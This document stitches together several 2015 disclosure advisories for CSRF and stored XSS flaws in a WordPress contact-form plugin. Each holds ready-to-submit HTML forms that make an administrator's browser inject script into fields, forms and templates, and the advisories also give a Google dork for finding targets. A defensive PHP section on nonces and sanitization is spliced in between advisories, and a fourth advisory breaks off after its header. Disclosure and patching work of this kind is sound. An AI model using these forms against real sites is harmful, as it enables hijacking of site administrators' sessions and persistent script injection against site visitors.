<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (create/update field for contact form) CSRF and Persistent issue
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://creative-solutions.net/
# Plugin URI: http://creative-solutions.net/wordpress/contact-form-generator/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
# Version: 2.0.1
# Tested on: Windows 10 + Firefox
======================
Description (plugin)
======================
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
(copied from the 'contactformgenerator.php' file)
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the WordPress plugin 'Contact Form Generator'.
The issue can be exploited by sending a specially crafted link to a WordPress administrator who has the vulnerable plugin installed.
Form field creation: when the victim opens the link, a new form field is created with HTML/JS code injected into it,
without the victim's knowledge.
Form field update: when the victim opens the link, the field identified by the 'id' parameter is updated
with injected HTML/JS code.
-->
<!--
================================
Form field creation [CSRF PoC]
================================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=fields" method="POST">
<input type="hidden" name="name" value=">"<img src=x>" />
<input type="hidden" name="id_form" value="8" /> <!-- an existing form id value for this element -->
<input type="hidden" name="id_type" value="1" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for create a field" />
</form>
</body>
<!--
================================
Form field update [CSRF PoC]
================================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=fields" method="POST">
<input type="hidden" name="name" value="s" onmouseover="alert(/i0-sec/)" a=" />
<input type="hidden" name="tooltip_text" value="s" onmouseover="alert(/i0-sec/)" a=" />
<input type="hidden" name="id_form" value="3" /> <!-- an existing form id value -->
<input type="hidden" name="id_type" value="1" />
<input type="hidden" name="column_type" value="0" />
<input type="hidden" name="required" value="0" />
<input type="hidden" name="published" value="1" />
<input type="hidden" name="width" value="s" onmouseover="alert(/i0-sec/)" a=" />
<input type="hidden" name="field_margin_top" value="s" onmouseover="alert(/i0-sec/)" a=" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="7" /> <!-- field id to edit -->
<input type="submit" value="Click me for update a field" />
</form>
</body>
</html>
<!--
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
-->
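The root cause shared by the create/update PoCs in these advisories is a save handler that accepts any POST from an administrator's browser and stores the submitted text verbatim. The following is an added defensive example, not the plugin's own code: the function names cfg_render_field_form(), cfg_handle_submit_data() and the nonce action strings are hypothetical, while the request parameters (holder, task, id, id_form, name, tooltip_text, width, field_margin_top, styles[]) are the ones the PoCs post to admin.php?page=cfg_forms&act=cfg_submit_data. It shows the two controls that close the issue: a WordPress nonce that a cross-site page cannot obtain, and sanitization on input plus escaping on output so a stored value such as "><img src=x> or s" onmouseover=... is rendered as text.

```php
<?php
// Added defensive example (not the plugin's code). Function names and nonce
// action strings are hypothetical; parameter names match the PoCs above.

// 1. The admin edit form embeds a nonce bound to the action and holder. The
//    nonce is tied to the logged-in user's session, so a page on another
//    origin cannot read or forge it, and a CSRF POST arrives without it.
function cfg_render_field_form( array $field ) {
    $action = admin_url( 'admin.php?page=cfg_forms&act=cfg_submit_data&holder=fields' );
    echo '<form method="post" action="' . esc_url( $action ) . '">';
    wp_nonce_field( 'cfg_submit_data_fields' ); // adds _wpnonce and _wp_http_referer
    // esc_attr() encodes " as &quot; and < > as &lt; &gt;, so a stored
    // "><img src=x> or s" onmouseover="..." stays inside the attribute value.
    echo '<input type="text" name="name" value="' . esc_attr( $field['name'] ) . '" />';
    echo '<input type="text" name="tooltip_text" value="' . esc_attr( $field['tooltip_text'] ) . '" />';
    echo '<input type="submit" value="Save" />';
    echo '</form>';
}

// 2. The handler refuses the request unless the caller is an administrator
//    and the nonce verifies; check_admin_referer() calls wp_die() on failure.
//    Returns the sanitized record for the caller to persist.
function cfg_handle_submit_data() {
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    $holder = isset( $_GET['holder'] ) ? sanitize_key( $_GET['holder'] ) : '';
    if ( ! in_array( $holder, array( 'forms', 'fields', 'templates' ), true ) ) {
        wp_die( 'Unknown holder.' );
    }
    check_admin_referer( 'cfg_submit_data_' . $holder );

    $task = isset( $_POST['task'] ) ? sanitize_key( $_POST['task'] ) : '';
    if ( 'save' !== $task ) {
        return null;
    }

    // 3. Whitelist the accepted keys and sanitize each value by type:
    //    integers through absint(), free text through sanitize_text_field(),
    //    which strips tags such as <img src=x>. Quotes are left alone here and
    //    neutralized by esc_attr()/esc_html() at output time.
    $record = array(
        'id'        => isset( $_POST['id'] ) ? absint( $_POST['id'] ) : 0,
        'id_form'   => isset( $_POST['id_form'] ) ? absint( $_POST['id_form'] ) : 0,
        'published' => empty( $_POST['published'] ) ? 0 : 1,
    );
    foreach ( array( 'name', 'tooltip_text', 'width', 'field_margin_top' ) as $key ) {
        $record[ $key ] = isset( $_POST[ $key ] )
            ? sanitize_text_field( wp_unslash( $_POST[ $key ] ) )
            : '';
    }
    // The template PoC posts styles[] keyed by numeric style id; keep the
    // key numeric and sanitize every value the same way.
    $record['styles'] = array();
    if ( isset( $_POST['styles'] ) && is_array( $_POST['styles'] ) ) {
        foreach ( $_POST['styles'] as $style_id => $value ) {
            $record['styles'][ absint( $style_id ) ] = sanitize_text_field( wp_unslash( $value ) );
        }
    }
    return $record;
}
```

With this in place the PoC forms above are rejected by check_admin_referer() before any value is read, and even a value that reaches storage through another path is escaped when the admin page renders it.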
<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (create/update form) CSRF and Persistent issue
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://creative-solutions.net/
# Plugin URI: http://creative-solutions.net/wordpress/contact-form-generator/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
# Version: 2.0.1
# Tested on: Windows 10 + Firefox
======================
Description (plugin)
======================
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
(copied from the 'contactformgenerator.php' file)
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the WordPress plugin 'Contact Form Generator'.
The issue can be exploited by sending a specially crafted link to a WordPress administrator who has the vulnerable plugin installed.
Form creation: when the victim opens the link, a new form is created with HTML/JS code injected into it,
without the victim's knowledge.
Form update: when the victim opens the link, the form identified by the 'id' parameter is updated
with injected HTML/JS code.
-->
<!--
=========================
Create form [CSRF PoC]
=========================
payload: "><img src=[x]><
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=forms" method="POST">
<input type="hidden" name="name" value="dsSASA"><img src=1><" />
<input type="hidden" name="top_text" value="xds"><img src=2><" />
<input type="hidden" name="pre_text" value="</textarea>"><img src=3><" />
<input type="hidden" name="thank_you_text" value="Message successfully sent"><img src=4><" />
<input type="hidden" name="send_text" value="Send"><img src=5><" />
<input type="hidden" name="send_new_text" value="New email"><img src=6><" />
<input type="hidden" name="close_alert_text" value="Close"><img src=7><" />
<input type="hidden" name="form_width" value="100%"><img src=8><" />
<input type="hidden" name="id_template" value="0" />
<input type="hidden" name="email_to" value=""><img src=9><" />
<input type="hidden" name="email_bcc" value=""><img src=10><" />
<input type="hidden" name="email_subject" value=""><img src=11><" />
<input type="hidden" name="email_from" value=""><img src=12><" />
<input type="hidden" name="email_from_name" value=""><img src=13><" />
<input type="hidden" name="email_replyto" value=""><img src=14><" />
<input type="hidden" name="email_replyto_name" value=""><img src=15><" />
<input type="hidden" name="redirect" value="0" />
<input type="hidden" name="redirect_itemid" value="2"><img src=17><" />
<input type="hidden" name="redirect_url" value=""><img src=16><" />
<input type="hidden" name="redirect_delay" value="0" />
<input type="hidden" name="send_copy_enable" value="1" />
<input type="hidden" name="send_copy_text" value="Send me a copy"><img src=17><" />
<input type="hidden" name="shake_count" value="2" />
<input type="hidden" name="shake_distanse" value="10" />
<input type="hidden" name="shake_duration" value="300" />
<input type="hidden" name="email_info_show_referrer" value="1" />
<input type="hidden" name="email_info_show_ip" value="1" />
<input type="hidden" name="email_info_show_browser" value="1" />
<input type="hidden" name="email_info_show_os" value="1" />
<input type="hidden" name="email_info_show_sc_res" value="1" />
<input type="hidden" name="show_back" value="1" />
<input type="hidden" name="published" value="1" />
<input type="hidden" name="custom_css" value="</textarea>"><img src=21><" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for create a form" />
</form>
</body>
<!--
==========================
Update form [CSRF PoC]
==========================
payload: "><img src=[x]><
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=forms" method="POST">
<input type="hidden" name="name" value="dsSASA"><img src=1><" />
<input type="hidden" name="top_text" value="xds"><img src=2><" />
<input type="hidden" name="pre_text" value="</textarea>"><img src=3><" />
<input type="hidden" name="thank_you_text" value="Message successfully sent"><img src=4><" />
<input type="hidden" name="send_text" value="Send"><img src=5><" />
<input type="hidden" name="send_new_text" value="New email"><img src=6><" />
<input type="hidden" name="close_alert_text" value="Close"><img src=7><" />
<input type="hidden" name="form_width" value="100%"><img src=8><" />
<input type="hidden" name="id_template" value="0" />
<input type="hidden" name="email_to" value=""><img src=9><" />
<input type="hidden" name="email_bcc" value=""><img src=10><" />
<input type="hidden" name="email_subject" value=""><img src=11><" />
<input type="hidden" name="email_from" value=""><img src=12><" />
<input type="hidden" name="email_from_name" value=""><img src=13><" />
<input type="hidden" name="email_replyto" value=""><img src=14><" />
<input type="hidden" name="email_replyto_name" value=""><img src=15><" />
<input type="hidden" name="redirect" value="0" />
<input type="hidden" name="redirect_itemid" value="2"><img src=17><" />
<input type="hidden" name="redirect_url" value=""><img src=16><" />
<input type="hidden" name="redirect_delay" value="0" />
<input type="hidden" name="send_copy_enable" value="1" />
<input type="hidden" name="send_copy_text" value="Send me a copy"><img src=17><" />
<input type="hidden" name="shake_count" value="2" />
<input type="hidden" name="shake_distanse" value="10" />
<input type="hidden" name="shake_duration" value="300" />
<input type="hidden" name="email_info_show_referrer" value="1" />
<input type="hidden" name="email_info_show_ip" value="1" />
<input type="hidden" name="email_info_show_browser" value="1" />
<input type="hidden" name="email_info_show_os" value="1" />
<input type="hidden" name="email_info_show_sc_res" value="1" />
<input type="hidden" name="show_back" value="1" />
<input type="hidden" name="published" value="1" />
<input type="hidden" name="custom_css" value="</textarea>"><img src=21><" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for edit form" />
</form>
</body>
</html>
<!--
===========
TIMELINE
===========
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
-->
<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (create/update template for contact form) CSRF and Persistent issue
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://creative-solutions.net/
# Plugin URI: http://creative-solutions.net/wordpress/contact-form-generator/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
# Version: 2.0.1
# Tested on: Windows 10 + Firefox
======================
Description (plugin)
======================
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
(copied from the 'contactformgenerator.php' file)
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the WordPress plugin 'Contact Form Generator'.
The issue can be exploited by sending a specially crafted link to a WordPress administrator who has the vulnerable plugin installed.
Template creation: when the victim opens the link, a new template is created with HTML/JS code injected into it,
without the victim's knowledge.
Template update: when the victim opens the link, the template identified by the 'id' parameter is updated
with injected HTML/JS code.
-->
<!--
==============================
create a template [CSRF PoC]
==============================
payload: "><img src=x>
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=templates" method="POST">
<input type="hidden" name="name" value="xsa"><img src=x>" /> <!-- persistent form name [XSS] -->
<input type="hidden" name="published" value="1" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for add new template" />
</form>
</body>
<!--
==============================
edit a template [CSRF PoC]
==============================
payload: "><img src=x>
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=templates" method="POST">
<input type="hidden" name="name" value=""><img src=x>" />
<input type="hidden" name="styles[587]" value=""><img src=x>" />
<input type="hidden" name="styles[588]" value=""><img src=x>" />
<input type="hidden" name="styles[131]" value="inherit" />
<input type="hidden" name="styles[589]" value="1" />
<input type="hidden" name="styles[629]" value="dark-thin" />
<input type="hidden" name="styles[630]" value="dark-thin" />
<input type="hidden" name="styles[627]" value="0" />
<input type="hidden" name="styles[0]" value=""><img src=x>" />
<input type="hidden" name="styles[130]" value=""><img src=x>" />
<input type="hidden" name="styles[517]" value=""><img src=x>" />
<input type="hidden" name="styles[518]" value=""><img src=x>" />
<input type="hidden" name="styles[1]" value=""><img src=x>" />
<input type="hidden" name="styles[2]" value=""><img src=x>" />
<input type="hidden" name="styles[3]" value="solid" />
<input type="hidden" name="styles[4]" value=""><img src=x>" />
<input type="hidden" name="styles[5]" value=""><img src=x>" />
<input type="hidden" name="styles[6]" value=""><img src=x>" />
<input type="hidden" name="styles[7]" value=""><img src=x>" />
<input type="hidden" name="styles[8]" value=""><img src=x>" />
<input type="hidden" name="styles[9]" value=""><img src=x>" />
<input type="hidden" name="styles[10]" value=""><img src=x>" />
<input type="hidden" name="styles[11]" value=""><img src=x>" />
<input type="hidden" name="styles[12]" value=""><img src=x>" />
<input type="hidden" name="styles[13]" value=""><img src=x>" />
<input type="hidden" name="styles[14]" value=""><img src=x>" />
<input type="hidden" name="styles[15]" value=""><img src=x>" />
<input type="hidden" name="styles[16]" value=""><img src=x>" />
<input type="hidden" name="styles[17]" value=""><img src=x>" />
<input type="hidden" name="styles[18]" value=""><img src=x>" />
<input type="hidden" name="styles[19]" value=""><img src=x>" />
<input type="hidden" name="styles[600]" value="0" />
<input type="hidden" name="styles[601]" value=""><img src=x>" />
<input type="hidden" name="styles[602]" value=""><img src=x>" />
<input type="hidden" name="styles[603]" value=""><img src=x>" />
<input type="hidden" name="styles[604]" value=""><img src=x>" />
<input type="hidden" name="styles[605]" value=""><img src=x>" />
<input type="hidden" name="styles[606]" value=""><img src=x>" />
<input type="hidden" name="styles[607]" value=""><img src=x>" />
<input type="hidden" name="styles[608]" value="solid" />
<input type="hidden" name="styles[609]" value=""><img src=x>" />
<input type="hidden" name="styles[610]" value="0" />
<input type="hidden" name="styles[611]" value=""><img src=x>" />
<input type="hidden" name="styles[612]" value=""><img src=x>" />
<input type="hidden" name="styles[613]" value=""><img src=x>" />
<input type="hidden" name="styles[614]" value=""><img src=x>" />
<input type="hidden" name="styles[615]" value=""><img src=x>" />
<input type="hidden" name="styles[616]" value=""><img src=x>" />
<input type="hidden" name="styles[617]" value="0" />
<input type="hidden" name="styles[618]" value=""><img src=x>" />
<input type="hidden" name="styles[619]" value=""><img src=x>" />
<input type="hidden" name="styles[620]" value=""><img src=x>" />
<input type="hidden" name="styles[621]" value=""><img src=x>" />
<input type="hidden" name="styles[622]" value=""><img src=x>" />
<input type="hidden" name="styles[623]" value=""><img src=x>" />
<input type="hidden" name="styles[624]" value=""><img src=x>" />
<input type="hidden" name="styles[625]" value="solid" />
<input type="hidden" name="styles[626]" value=""><img src=x>" />
<input type="hidden" name="styles[20]" value=""><img src=x>" />
<input type="hidden" name="styles[21]" value=""><img src=x>" />
<input type="hidden" name="styles[22]" value="normal" />
<input type="hidden" name="styles[23]" value="normal" />
<input type="hidden" name="styles[24]" value="none" />
<input type="hidden" name="styles[25]" value="left" />
<input type="hidden" name="styles[506]" value="inherit" />
<input type="hidden" name="styles[510]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[27]" value=""><img src=x>" />
<input type="hidden" name="styles[28]" value=""><img src=x>" />
<input type="hidden" name="styles[29]" value=""><img src=x>" />
<input type="hidden" name="styles[30]" value=""><img src=x>" />
<input type="hidden" name="styles[190]" value=""><img src=x>" />
<input type="hidden" name="styles[191]" value=""><img src=x>" />
<input type="hidden" name="styles[192]" value=""><img src=x>" />
<input type="hidden" name="styles[502]" value="left" />
<input type="hidden" name="styles[193]" value=""><img src=x>" />
<input type="hidden" name="styles[194]" value=""><img src=x>" />
<input type="hidden" name="styles[195]" value=""><img src=x>" />
<input type="hidden" name="styles[196]" value="solid" />
<input type="hidden" name="styles[197]" value=""><img src=x>" />
<input type="hidden" name="styles[198]" value=""><img src=x>" />
<input type="hidden" name="styles[199]" value="normal" />
<input type="hidden" name="styles[200]" value="normal" />
<input type="hidden" name="styles[201]" value="none" />
<input type="hidden" name="styles[202]" value="inherit" />
<input type="hidden" name="styles[511]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[203]" value=""><img src=x>" />
<input type="hidden" name="styles[204]" value=""><img src=x>" />
<input type="hidden" name="styles[205]" value=""><img src=x>" />
<input type="hidden" name="styles[206]" value=""><img src=x>" />
<input type="hidden" name="styles[215]" value=""><img src=x>" />
<input type="hidden" name="styles[216]" value=""><img src=x>" />
<input type="hidden" name="styles[217]" value=""><img src=x>" />
<input type="hidden" name="styles[218]" value=""><img src=x>" />
<input type="hidden" name="styles[31]" value=""><img src=x>" />
<input type="hidden" name="styles[32]" value=""><img src=x>" />
<input type="hidden" name="styles[33]" value="normal" />
<input type="hidden" name="styles[34]" value="normal" />
<input type="hidden" name="styles[35]" value="none" />
<input type="hidden" name="styles[36]" value="left" />
<input type="hidden" name="styles[507]" value="inherit" />
<input type="hidden" name="styles[512]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[37]" value=""><img src=x>" />
<input type="hidden" name="styles[38]" value=""><img src=x>" />
<input type="hidden" name="styles[39]" value=""><img src=x>" />
<input type="hidden" name="styles[40]" value=""><img src=x>" />
<input type="hidden" name="styles[41]" value=""><img src=x>" />
<input type="hidden" name="styles[42]" value=""><img src=x>" />
<input type="hidden" name="styles[43]" value="normal" />
<input type="hidden" name="styles[44]" value="normal" />
<input type="hidden" name="styles[509]" value="inherit" />
<input type="hidden" name="styles[46]" value=""><img src=x>" />
<input type="hidden" name="styles[47]" value=""><img src=x>" />
<input type="hidden" name="styles[48]" value=""><img src=x>" />
<input type="hidden" name="styles[49]" value=""><img src=x>" />
<input type="hidden" name="styles[505]" value="white" />
<input type="hidden" name="styles[508]" value="inherit" />
<input type="hidden" name="styles[132]" value=""><img src=x>" />
<input type="hidden" name="styles[133]" value=""><img src=x>" />
<input type="hidden" name="styles[168]" value=""><img src=x>" />
<input type="hidden" name="styles[519]" value=""><img src=x>" />
<input type="hidden" name="styles[520]" value=""><img src=x>" />
<input type="hidden" name="styles[500]" value="left" />
<input type="hidden" name="styles[501]" value="left" />
<input type="hidden" name="styles[134]" value=""><img src=x>" />
<input type="hidden" name="styles[135]" value=""><img src=x>" />
<input type="hidden" name="styles[136]" value="solid" />
<input type="hidden" name="styles[137]" value=""><img src=x>" />
<input type="hidden" name="styles[138]" value=""><img src=x>" />
<input type="hidden" name="styles[139]" value=""><img src=x>" />
<input type="hidden" name="styles[140]" value=""><img src=x>" />
<input type="hidden" name="styles[141]" value=""><img src=x>" />
<input type="hidden" name="styles[142]" value=""><img src=x>" />
<input type="hidden" name="styles[143]" value=""><img src=x>" />
<input type="hidden" name="styles[144]" value=""><img src=x>" />
<input type="hidden" name="styles[145]" value=""><img src=x>" />
<input type="hidden" name="styles[146]" value=""><img src=x>" />
<input type="hidden" name="styles[147]" value=""><img src=x>" />
<input type="hidden" name="styles[148]" value=""><img src=x>" />
<input type="hidden" name="styles[149]" value="normal" />
<input type="hidden" name="styles[150]" value="normal" />
<input type="hidden" name="styles[151]" value="none" />
<input type="hidden" name="styles[152]" value="inherit" />
<input type="hidden" name="styles[153]" value=""><img src=x>" />
<input type="hidden" name="styles[154]" value=""><img src=x>" />
<input type="hidden" name="styles[155]" value=""><img src=x>" />
<input type="hidden" name="styles[156]" value=""><img src=x>" />
<input type="hidden" name="styles[157]" value=""><img src=x>" />
<input type="hidden" name="styles[158]" value=""><img src=x>" />
<input type="hidden" name="styles[159]" value=""><img src=x>" />
<input type="hidden" name="styles[160]" value=""><img src=x>" />
<input type="hidden" name="styles[161]" value=""><img src=x>" />
<input type="hidden" name="styles[162]" value=""><img src=x>" />
<input type="hidden" name="styles[163]" value=""><img src=x>" />
<input type="hidden" name="styles[164]" value=""><img src=x>" />
<input type="hidden" name="styles[165]" value=""><img src=x>" />
<input type="hidden" name="styles[166]" value=""><img src=x>" />
<input type="hidden" name="styles[167]" value=""><img src=x>" />
<input type="hidden" name="styles[513]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[176]" value=""><img src=x>" />
<input type="hidden" name="styles[177]" value=""><img src=x>" />
<input type="hidden" name="styles[178]" value=""><img src=x>" />
<input type="hidden" name="styles[179]" value=""><img src=x>" />
<input type="hidden" name="styles[180]" value=""><img src=x>" />
<input type="hidden" name="styles[181]" value=""><img src=x>" />
<input type="hidden" name="styles[182]" value=""><img src=x>" />
<input type="hidden" name="styles[183]" value=""><img src=x>" />
<input type="hidden" name="styles[184]" value=""><img src=x>" />
<input type="hidden" name="styles[185]" value=""><img src=x>" />
<input type="hidden" name="styles[186]" value=""><img src=x>" />
<input type="hidden" name="styles[187]" value=""><img src=x>" />
<input type="hidden" name="styles[188]" value=""><img src=x>" />
<input type="hidden" name="styles[189]" value=""><img src=x>" />
<input type="hidden" name="styles[171]" value=""><img src=x>" />
<input type="hidden" name="styles[514]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[172]" value=""><img src=x>" />
<input type="hidden" name="styles[173]" value=""><img src=x>" />
<input type="hidden" name="styles[174]" value=""><img src=x>" />
<input type="hidden" name="styles[175]" value=""><img src=x>" />
<input type="hidden" name="styles[169]" value=""><img src=x>" />
<input type="hidden" name="styles[521]" value=""><img src=x>" />
<input type="hidden" name="styles[522]" value=""><img src=x>" />
<input type="hidden" name="styles[170]" value=""><img src=x>" />
<input type="hidden" name="styles[523]" value=""><img src=x>" />
<input type="hidden" name="styles[535]" value=""><img src=x>" />
<input type="hidden" name="styles[536]" value=""><img src=x>" />
<input type="hidden" name="styles[537]" value=""><img src=x>" />
<input type="hidden" name="styles[538]" value=""><img src=x>" />
<input type="hidden" name="styles[539]" value=""><img src=x>" />
<input type="hidden" name="styles[540]" value=""><img src=x>" />
<input type="hidden" name="styles[541]" value=""><img src=x>" />
<input type="hidden" name="styles[542]" value=""><img src=x>" />
<input type="hidden" name="styles[543]" value=""><img src=x>" />
<input type="hidden" name="styles[544]" value=""><img src=x>" />
<input type="hidden" name="styles[545]" value=""><img src=x>" />
<input type="hidden" name="styles[546]" value=""><img src=x>" />
<input type="hidden" name="styles[547]" value="solid" />
<input type="hidden" name="styles[548]" value=""><img src=x>" />
<input type="hidden" name="styles[549]" value=""><img src=x>" />
<input type="hidden" name="styles[550]" value=""><img src=x>" />
<input type="hidden" name="styles[551]" value=""><img src=x>" />
<input type="hidden" name="styles[524]" value=""><img src=x>" />
<input type="hidden" name="styles[525]" value=""><img src=x>" />
<input type="hidden" name="styles[526]" value="normal" />
<input type="hidden" name="styles[527]" value="normal" />
<input type="hidden" name="styles[528]" value="none" />
<input type="hidden" name="styles[529]" value="inherit" />
<input type="hidden" name="styles[530]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[531]" value=""><img src=x>" />
<input type="hidden" name="styles[532]" value=""><img src=x>" />
<input type="hidden" name="styles[533]" value=""><img src=x>" />
<input type="hidden" name="styles[534]" value=""><img src=x>" />
<input type="hidden" name="styles[91]" value=""><img src=x>" />
<input type="hidden" name="styles[50]" value=""><img src=x>" />
<input type="hidden" name="styles[212]" value="left" />
<input type="hidden" name="styles[92]" value=""><img src=x>" />
<input type="hidden" name="styles[93]" value=""><img src=x>" />
<input type="hidden" name="styles[209]" value=""><img src=x>" />
<input type="hidden" name="styles[100]" value=""><img src=x>" />
<input type="hidden" name="styles[101]" value=""><img src=x>" />
<input type="hidden" name="styles[127]" value="solid" />
<input type="hidden" name="styles[102]" value=""><img src=x>" />
<input type="hidden" name="styles[103]" value=""><img src=x>" />
<input type="hidden" name="styles[104]" value=""><img src=x>" />
<input type="hidden" name="styles[105]" value=""><img src=x>" />
<input type="hidden" name="styles[94]" value=""><img src=x>" />
<input type="hidden" name="styles[95]" value=""><img src=x>" />
<input type="hidden" name="styles[96]" value=""><img src=x>" />
<input type="hidden" name="styles[97]" value=""><img src=x>" />
<input type="hidden" name="styles[98]" value=""><img src=x>" />
<input type="hidden" name="styles[99]" value=""><img src=x>" />
<input type="hidden" name="styles[106]" value=""><img src=x>" />
<input type="hidden" name="styles[107]" value=""><img src=x>" />
<input type="hidden" name="styles[108]" value="normal" />
<input type="hidden" name="styles[109]" value="normal" />
<input type="hidden" name="styles[110]" value="none" />
<input type="hidden" name="styles[112]" value="inherit" />
<input type="hidden" name="styles[515]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[113]" value=""><img src=x>" />
<input type="hidden" name="styles[114]" value=""><img src=x>" />
<input type="hidden" name="styles[115]" value=""><img src=x>" />
<input type="hidden" name="styles[116]" value=""><img src=x>" />
<input type="hidden" name="styles[51]" value=""><img src=x>" />
<input type="hidden" name="styles[52]" value=""><img src=x>" />
<input type="hidden" name="styles[124]" value=""><img src=x>" />
<input type="hidden" name="styles[516]" value="cfg_font_effect_none" />
<input type="hidden" name="styles[125]" value=""><img src=x>" />
<input type="hidden" name="styles[126]" value=""><img src=x>" />
<input type="hidden" name="styles[117]" value=""><img src=x>" />
<input type="hidden" name="styles[118]" value=""><img src=x>" />
<input type="hidden" name="styles[119]" value=""><img src=x>" />
<input type="hidden" name="styles[120]" value=""><img src=x>" />
<input type="hidden" name="styles[121]" value=""><img src=x>" />
<input type="hidden" name="styles[122]" value=""><img src=x>" />
<input type="hidden" name="styles[552]" value="1" />
<input type="hidden" name="styles[553]" value=""><img src=x>" />
<input type="hidden" name="styles[554]" value=""><img src=x>" />
<input type="hidden" name="styles[555]" value="normal" />
<input type="hidden" name="styles[556]" value="normal" />
<input type="hidden" name="styles[596]" value="none" />
<input type="hidden" name="styles[590]" value=""><img src=x>" />
<input type="hidden" name="styles[591]" value="solid" />
<input type="hidden" name="styles[592]" value=""><img src=x>" />
<input type="hidden" name="styles[558]" value=""><img src=x>" />
<input type="hidden" name="styles[559]" value=""><img src=x>" />
<input type="hidden" name="styles[560]" value=""><img src=x>" />
<input type="hidden" name="styles[561]" value=""><img src=x>" />
<input type="hidden" name="styles[563]" value="1" />
<input type="hidden" name="styles[562]" value="1" />
<input type="hidden" name="styles[597]" value=""><img src=x>" />
<input type="hidden" name="styles[598]" value=""><img src=x>" />
<input type="hidden" name="styles[564]" value=""><img src=x>" />
<input type="hidden" name="styles[565]" value="normal" />
<input type="hidden" name="styles[566]" value="normal" />
<input type="hidden" name="styles[594]" value="none" />
<input type="hidden" name="styles[567]" value=""><img src=x>" />
<input type="hidden" name="styles[568]" value="solid" />
<input type="hidden" name="styles[569]" value=""><img src=x>" />
<input type="hidden" name="styles[570]" value=""><img src=x>" />
<input type="hidden" name="styles[571]" value=""><img src=x>" />
<input type="hidden" name="styles[572]" value=""><img src=x>" />
<input type="hidden" name="styles[573]" value=""><img src=x>" />
<input type="hidden" name="styles[574]" value=""><img src=x>" />
<input type="hidden" name="styles[595]" value="none" />
<input type="hidden" name="styles[575]" value=""><img src=x>" />
<input type="hidden" name="styles[576]" value=""><img src=x>" />
<input type="hidden" name="styles[577]" value=""><img src=x>" />
<input type="hidden" name="styles[578]" value=""><img src=x>" />
<input type="hidden" name="styles[579]" value=""><img src=x>" />
<input type="hidden" name="styles[580]" value=""><img src=x>" />
<input type="hidden" name="styles[581]" value="normal" />
<input type="hidden" name="styles[582]" value="normal" />
<input type="hidden" name="styles[593]" value="none" />
<input type="hidden" name="styles[583]" value=""><img src=x>" />
<input type="hidden" name="styles[584]" value=""><img src=x>" />
<input type="hidden" name="styles[585]" value=""><img src=x>" />
<input type="hidden" name="styles[586]" value=""><img src=x>" />
<input type="hidden" name="styles[599]" value=""><img src=x>" />
<input type="hidden" name="styles[628]" value=""><img src=x>" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="2" /> <!-- template id to edit -->
<input type="submit" value="Click me for update template" />
</form>
</body>
</html>
<!--
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
-->
<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (delete) Cross-site Request Forgery (CSRF) issues
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
